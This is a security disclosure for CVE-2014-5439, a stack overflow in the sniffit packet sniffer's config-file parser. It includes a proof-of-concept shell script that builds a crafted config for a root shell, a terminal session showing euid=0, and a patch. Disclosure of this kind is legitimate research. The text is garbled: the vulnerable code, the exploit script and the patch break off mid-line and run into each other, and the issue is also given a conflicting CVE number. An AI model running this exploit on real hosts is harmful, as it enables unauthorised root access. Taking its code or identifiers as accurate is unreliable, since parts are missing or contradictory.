CVE-2014-5439 - Root shell on Sniffit Authors: Ismael Ripoll & Hector Marco CVE: CVE-2014-5439 Dates: July 2014 - Discovered the vulnerability Description Sniffit is a packet sniffer and monitoring tool. A bug in sniffit prior to 0.3.7 has been found. The bug is caused by an incorrect implementation of the functions clean_filename() and clean_string() which causes a stack buffer overflow when parsing a configuration file with "long" paths (more than 20 characters). The attacker can to create a specially-crafted sniffit configuration file, which is able to bypass all three protection mechanisms: Non-eXecutable bit NX Stack Smashing Protector SSP Address Space Layout Randomisation ASLR And execute arbitrary code with root privileges (the id of the user that launches the sniffit). The new issue has been assigned CVE-2014-7169. The presented PoC successfully exploits the vulnerability. Impact To use the sniffit, the application need to be executed with root privileges. Typically by sudo or pkexec or setting the UID bit. Since this tool requires this privilege to execute the sniffer, only allowing to a user execute the sniffer is enough to execute commands as root. Vulnerable packages The sniffit 0.3.7 and prior are affected. Currently, this tool is in the universe repository installable via apt-get install sniffit. For example, the sniffit is available on Ubuntu 14.04.1 LTS and prior. Vulnerability The vulnerability is caused due to incorrect implementation of the functions clean_filename() and clean_string(). These functions suffer from a stack buffer overflow. The bug appears in file sn_cfgfile.c on the following functions: char *clean_string (char *string) { char help[20]; int i, j; j=0; for (i=0;i" echo " Website: http://hmarco.org" echo " Comment: Exploit for sniffit <= 0.3.7 (root shell)" echo "" echo "----------------=======================----------------" echo "-----------------------=======-------------------------" echo "" echo "[+] Creating crafted configuration file for sniffit ..." echo "${cfgfile}" | base64 -d > exploit-sniffit-0.3.7-shell.cfg echo -e "\n[+] File exploit-sniffit-0.3.7-shell.cfg successfully created !" echo "" echo "[+] Help:" echo " If your sniffit is installed with the Set-User-ID then execute:" echo " $ sniffit -c exploit-sniffit-0.3.7-shell.cfg" echo "" echo " If your are allowed to to execute the sniffit with sudo then execute:" echo " $ sudo sniffit -c exploit-sniffit-0.3.7-shell.cfg" echo "" ---- end exploit-sniffit-0.3.7-shell.sh exploit ---- Obtaining a root shell: box@upv.es:~$ id uid=1000(box) gid=1000(box) groups=1000(box) box@upv.es:~$ sniffit -c exploit-sniffit-shell.cfg # # id uid=1000(box) gid=1000(box) euid=0(root) groups=1000(box) FIX The following is a simple patch which fixes the bug. Patch for sniffit 0.3.7: diff -Nurp sniffit-0.3.7.beta/sn_cfgfile.c sniffit-0.3.7.beta-mod/sn_cfgfile.c --- sniffit-0.3.7.beta/sn_cfgfile.c 2014-10-22 19:29:03.000000000 +0200 +++ sniffit-0.3.7.beta-mod/sn_cfgfile.c 2014-10-22 19:29:12.244971893 +0200 @@ -119,6 +119,11 @@ char *clean_string (char *string) char help[20]; int i, j; +if(strlen(string) >= 20){ + fprintf(stderr, "Error: String too long [%s]\n", string); + exit(-1); +} + j=0; for(i=0;i= 20){ + fprintf(stderr, "Error: String too long [%s]\n", string); + exit(-1); +} + j=0; for(i=0;i